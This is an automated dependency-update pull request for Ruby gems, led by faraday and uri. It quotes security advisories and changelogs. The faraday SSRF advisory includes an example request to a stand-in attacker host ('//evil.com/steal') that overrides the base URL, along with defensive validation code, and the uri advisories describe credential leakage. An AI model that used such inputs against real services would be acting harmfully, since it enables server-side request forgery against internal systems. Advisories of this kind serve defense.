🚨 [security] Update faraday 2.9.0 → 2.14.1 (minor)

[depfu]

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

↗️ faraday (indirect, 2.9.0 → 2.14.1) · Repo · Changelog

Security Advisories 🚨

🚨 Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ faraday-net_http (indirect, 3.1.0 → 3.4.2) · Repo · Changelog

Release Notes

3.4.2

What's Changed

• Use more conservative net-http version constraint by @RDeckard in #53

New Contributors

• @RDeckard made their first contribution in #53

Full Changelog: v3.4.1...v3.4.2

3.4.1

What's Changed

• Prepare Trusted Publisher by @djsmentya in #50

New Contributors

• @djsmentya made their first contribution in #50

Full Changelog: v3.4.0...v3.4.1

3.4.0

What's Changed

• Add HTTPS Proxy support by @richardmarbach in #47
• Fix HTTPS proxy support by @richardmarbach in #48

New Contributors

• @richardmarbach made their first contribution in #47

Full Changelog: v3.3.0...v3.4.0

3.3.0

What's Changed

• Opt-in for MFA requirement explicitly by @tagliala in #43
• Run CI against main branch of Faraday by @iMacTia in #46
• Add support for ciphers SSLOptions by @womblep in #45

New Contributors

• @tagliala made their first contribution in #43
• @womblep made their first contribution in #45

Full Changelog: v3.2.0...v3.3.0

3.2.0

What's Changed

• Added: Support setting SSL client cert as a an array, to configure extra_chain_cert by @larkro and @kaspth in #42
• Developer experience: Unlock simplecov by @olleolleolle in #40

Full Changelog: v3.1.1...v3.2.0

3.1.1

What's Changed

• net_http adapter: Fix to avoid calling configure_ssl for HTTP connections by @ma2gedev in #38

Full Changelog: v3.1.0...v3.1.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 24 commits:

• Update ci.yml to allow manual runs
• Version bump to 3.4.2
• Use more conservative net-http version constraint (#53)
• Bump actions/checkout from 4 to 5 (#51)
• CI: Fix grammar error in Publish workflow
• CI: Ensure Rake is available in publish action
• v3.4.1
• CI: Add Ruby 3.4 to build matrix
• Use Ruby 3.4.4
• Prepare Trusted Publisher (#50)
• v3.4.0
• Fix HTTPS proxy support (#48)
• Add HTTPS Proxy support (#47)
• Version bump to 3.3.0
• Accept SSLOptions->ciphers to be passed to the Net::HTTP instance (#45)
• Run CI against `main` branch of Faraday. (#46)
• Opt-in for MFA requirement explicitly (#43)
• v3.2.0
• Support setting SSL client cert as a an array, to configure extra_chain_cert (#42)
• Use latest Ruby
• Unlock simplecov in Gemfile
• v3.1.1
• Lint: Style/IfUnlessModifier
• Fix conditions for calling `configure_ssl`

↗️ net-http (indirect, 0.4.1 → 0.9.1) · Repo · Changelog

Release Notes

0.9.1

What's Changed

• Raise Net::OpenTimeout when TCPSocket.open raises IO::TimeoutError. by @shioimm in #263
• Freeze more constants for Ractor compatibility by @rhenium in #256

New Contributors

• @shioimm made their first contribution in #263

Full Changelog: v0.9.0...v0.9.1

0.9.0

What's Changed

• open: Never call Timeout.timeout in rescue clause by @osyoyu in #250
• Fixed by misspell -w -error -source=text by @hsbt in #254
• Check whether TCPSocket#initialize supports open_timeout once and without exceptions by @eregon in #252
• Refactor HTTPS tests by @rhenium in #255

New Contributors

• @eregon made their first contribution in #252

Full Changelog: v0.8.0...v0.9.0

0.8.0

Breaking changes

• Minimum Ruby version raised to 2.7 along with the raise of minimum uri gem version (0.11.1)

What's Changed

• [DOC] Fix too stopped documentations by @nobu in #244
• Replace Timeout.timeout with TCPSocket.open(open_timeout:) when available by @osyoyu in #224
• Replace Ruby 3.5 with Ruby 4.0 by @yahonda in #246
• Fix handling of IPv6 literal hosts in Net::HTTPGenericRequest by @taketo1113 in #237
  • This fixes compatibility issue with uri gem 1.1.0+, which made relevant validations strict.

New Contributors

• @yahonda made their first contribution in #246
• @taketo1113 made their first contribution in #237

Full Changelog: v0.7.0...v0.8.0

0.7.0

What's Changed

• [DOC] Fix broken rdoc-ref links by @st0012 in #199
• Don't double-interrupt the test HTTP server by @headius in #197
• Provide a 'Changelog' link on rubygems.org/gems/net-http by @mark-young-atg in #201
• Freeze some constants to improve Ractor compatibility by @osyoyu in #206
• Don't set content type by default by @hsbt in #207
• Support pretty_print by @nobu in #160
• Add a workflow to sync commits to ruby/ruby by @k0kubun in #230

New Contributors

• @st0012 made their first contribution in #199
• @headius made their first contribution in #197
• @mark-young-atg made their first contribution in #201
• @osyoyu made their first contribution in #206

Full Changelog: v0.6.0...v0.7.0

0.6.0

What's Changed

• Remove deprecated constants by @nobu in #189
• Bump step-security/harden-runner from 2.10.1 to 2.10.2 by @dependabot in #190
• Restore HTTPSession constant for backward compatibility by @hsbt in #191
• Need to restore under the Net namespace by @hsbt in #192
• Bump rubygems/release-gem from 612653d273a73bdae1df8453e090060bb4db5f31 to 9e85cb11501bebc2ae661c1500176316d3987059 by @dependabot in #196

Full Changelog: v0.5.0...v0.6.0

0.5.0

What's Changed

• don't invoke response block more than once due to retry by @jeremyevans in #170
• [DOC] Tweak to Net::HTTP What's Here by @BurdetteLamar in #171
• [DOC] README.md - update rfc references by @MSP-Greg in #166
• Add Net::HTTP.put method by @Zopolis4 in #175
• Replace Regexp in for headers for perf by @baweaver in #140
• Remove WEBrick from dependency by @hsbt in #180
• Try to test with Windows platform by @hsbt in #181
• net/http.rb - derive SSL_IVNAMES from SSL_ATTRIBUTES by @MSP-Greg in #164
• test_https.rb - fix test_session_reuse_but_expire by @MSP-Greg in #178
• Add ability to configure default settings for new connections by @fatkodima in #177
• implement talking SSL to the proxy too by @evgeni in #55
• Removed needless NullWriter class by @hsbt in #182
• Prevent warnings by @mame in #185

New Contributors

• @MSP-Greg made their first contribution in #166
• @Zopolis4 made their first contribution in #175
• @fatkodima made their first contribution in #177
• @evgeni made their first contribution in #55
• @mame made their first contribution in #185

Full Changelog: v0.4.1...v0.5.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ uri (indirect, 0.13.2 → 1.1.1) · Repo · Changelog

Security Advisories 🚨

🚨 URI Credential Leakage Bypass over CVE-2025-27221

Impact

In affected URI version, a bypass exists for the fix to CVE-2025-27221 that can expose user credentials.

When using the + operator to combine URIs, sensitive information like passwords from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure.

The vulnerability affects the uri gem bundled with the following Ruby series:

• 0.12.4 and earlier (bundled in Ruby 3.2 series)
• 0.13.2 and earlier (bundled in Ruby 3.3 series)
• 1.0.3 and earlier (bundled in Ruby 3.4 series)

Patches

Upgrade to 0.12.5, 0.13.3 or 1.0.4

References

• https://www.ruby-lang.org/en/news/2025/02/26/security-advisories/
• https://hackerone.com/reports/2957667

🚨 URI Credential Leakage Bypass over CVE-2025-27221

Impact

In affected URI version, a bypass exists for the fix to CVE-2025-27221 that can expose user credentials.

When using the + operator to combine URIs, sensitive information like passwords from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure.

The vulnerability affects the uri gem bundled with the following Ruby series:

• 0.12.4 and earlier (bundled in Ruby 3.2 series)
• 0.13.2 and earlier (bundled in Ruby 3.3 series)
• 1.0.3 and earlier (bundled in Ruby 3.4 series)

Patches

Upgrade to 0.12.5, 0.13.3 or 1.0.4

References

• https://www.ruby-lang.org/en/news/2025/02/26/security-advisories/
• https://hackerone.com/reports/2957667

🚨 URI allows for userinfo Leakage in URI#join, URI#merge, and URI#+

There is a possibility for userinfo leakage by in the uri gem.
This vulnerability has been assigned the CVE identifier CVE-2025-27221. We recommend upgrading the uri gem.

Details

The methods URI#join, URI#merge, and URI#+ retained userinfo, such as user:password, even after the host is replaced. When generating a URL to a malicious host from a URL containing secret userinfo using these methods, and having someone access that URL, an unintended userinfo leak could occur.

Please update URI gem to version 0.11.3, 0.12.4, 0.13.2, 1.0.3 or later.

Affected versions

uri gem versions < 0.11.3, 0.12.0 to 0.12.3, 0.13.0, 0.13.1 and 1.0.0 to 1.0.2.

Credits

Thanks to Tsubasa Irisawa (lambdasawa) for discovering this issue.
Also thanks to nobu for additional fixes of this vulnerability.

Release Notes

1.1.1

What's Changed

• Re-allow consecutive, leading and trailing dots in EMAIL_REGEXP by @osyoyu in #189

New Contributors

• @osyoyu made their first contribution in #189

Full Changelog: v1.1.0...v1.1.1

1.1.0

What's Changed

• Update to use the latest version of setup-ruby and bump up to Ruby 3.4 by @hsbt in #158
• Fix the mention to removed URI.escape/URI::Escape by @y-yagi in #146
• Use a fully qualified name in warning messages by @y-yagi in #150
• Support Ractor#value by @hsbt in #163
• Removed unnecessary workaround by @hsbt in #164
• Escape reserved characters in scheme name by @nobu in #148
• [DOC] State that uri library is needed to call Kernel#URI by @nobu in #167
• Prefer dedicated assertion methods by @nobu in #169
• Fix the message for unexpected argument by @nobu in #171
• Make URI::regexp schemes case sensitive (#38) by @nobu in #170
• The local part should not contain leading or trailing dots in the EMAIL_REGEXP by @nlevchuk in #124
• More checks in EMAIL_REGEXP by @nobu in #172
• Do not allow empty host names, as they are not allowed by RFC 3986 by @jeremyevans in #116
• Improve performance of URI::MailTo::EMAIL_REGEXP by @nobu in #173
• Performance test stability by @nobu in #174
• Update documents that used URI::Parser by @nobu in #175
• Add a workflow to sync commits to ruby/ruby by @k0kubun in #183
• Add irb to the Gemfile to fix the warning by @y-yagi in #182
• Replace reference to the obsolete URI.escape with URI::RFC2396_PARSER.escape by @vivshaw in #166
• Switch a parsing behavior completely when switching a parser by @y-yagi in #161
• improve error message by @soda92 in #130
• Use generic version number to VERSION by @hsbt in #187

New Contributors

• @y-yagi made their first contribution in #146
• @nlevchuk made their first contribution in #124
• @vivshaw made their first contribution in #166
• @soda92 made their first contribution in #130

Full Changelog: v1.0.4...v1.1.0

1.0.4

Security fixes

• CVE-2025-61594

---

Full Changelog: v1.0.3...v1.0.4

1.0.3

What's Changed

• Bump step-security/harden-runner from 2.10.1 to 2.10.2 by @dependabot in #136
• Bump rubygems/release-gem from 612653d273a73bdae1df8453e090060bb4db5f31 to 9e85cb11501bebc2ae661c1500176316d3987059 by @dependabot in #137
• Prevent a warning: URI::REGEXP is obsolete by @mame in #138
• Revisit deprecated test by @hsbt in #139
• Suppress deprecate warning of test class (retry) by @mame in #140
• Fix README by @hsbt in #142
• Bump rubygems/release-gem from 1.1.0 to 1.1.1 by @dependabot in #143
• Bump step-security/harden-runner from 2.10.2 to 2.10.3 by @dependabot in #144
• Bump step-security/harden-runner from 2.10.3 to 2.10.4 by @dependabot in #145
• Make documentation 100% by @nobu in #147
• Bump step-security/harden-runner from 2.10.4 to 2.11.0 by @dependabot in #153
• Remove userinfo by @hsbt in #154

New Contributors

• @mame made their first contribution in #138

Full Changelog: v1.0.2...v1.0.3

1.0.2

What's Changed

• Fix minor typo from 9997c1a by @jrafanie in #127
• Don't use bundle exec by @hsbt in #133
• Remove unused files from the gem package by @orien in #129
• Restore constants like URI::REGEXP::PATTERN::IPV6ADDR by @hsbt in #132
• Check existence constants only URI module by @hsbt in #135

New Contributors

• @jrafanie made their first contribution in #127
• @orien made their first contribution in #129

Full Changelog: v1.0.1...v1.0.2

1.0.1

Full Changelog: v1.0.0...v1.0.1

1.0.0

What's Changed

• Bump actions/configure-pages from 3 to 4 by @dependabot in #94
• Bump actions/deploy-pages from 2 to 3 by @dependabot in #93
• Bump actions/upload-pages-artifact from 2 to 3 by @dependabot in #97
• Bump actions/deploy-pages from 3 to 4 by @dependabot in #98
• Make URI#to_s prepend relative path with / if there is a host or port by @jeremyevans in #90
• Removed commented-out code by @hsbt in #99
• Use https instead of http by @hsbt in #101
• Use www.rfc-editor.org for RFC text. by @hsbt in #102
• Bump actions/configure-pages from 4 to 5 by @dependabot in #103
• Exclude Ruby 2.5 from Apple Silicon by @hsbt in #106
• Use RFC3986_Parser by default by @hsbt in #107
• Restrict const checks to current namespace to avoid conflict with globals by @rwstauner in #108
• Use Ruby 3.3 for gh_pages build by @jeremyevans in #109
• Use DEFAULT_PARSER at split, parse, join by @hsbt in #111
• Add space after bad URI by @jsoref in #37
• Fallback missing constants with RFC3986_PARSER by @hsbt in #113
• Warn compatibility methods in RFC3986_PARSER by @hsbt in #114
• Also warn URI::RFC3986_PARSER.extract by @hsbt in #121
• Fix spelling of "cannot" by @deivid-rodriguez in #123

New Contributors

• @rwstauner made their first contribution in #108
• @jsoref made their first contribution in #37

Full Changelog: v0.13.0...v1.0.0

0.13.3

Security fixes

• CVE-2025-61594

---

Full Changelog: v0.13.2...v0.13.3

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

🆕 json (added, 2.18.1)

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)